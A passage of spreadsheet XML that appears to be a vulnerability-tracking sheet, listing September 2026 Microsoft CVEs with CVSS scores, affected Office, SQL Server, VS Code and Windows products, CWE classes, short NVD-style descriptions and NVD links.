          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78463</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
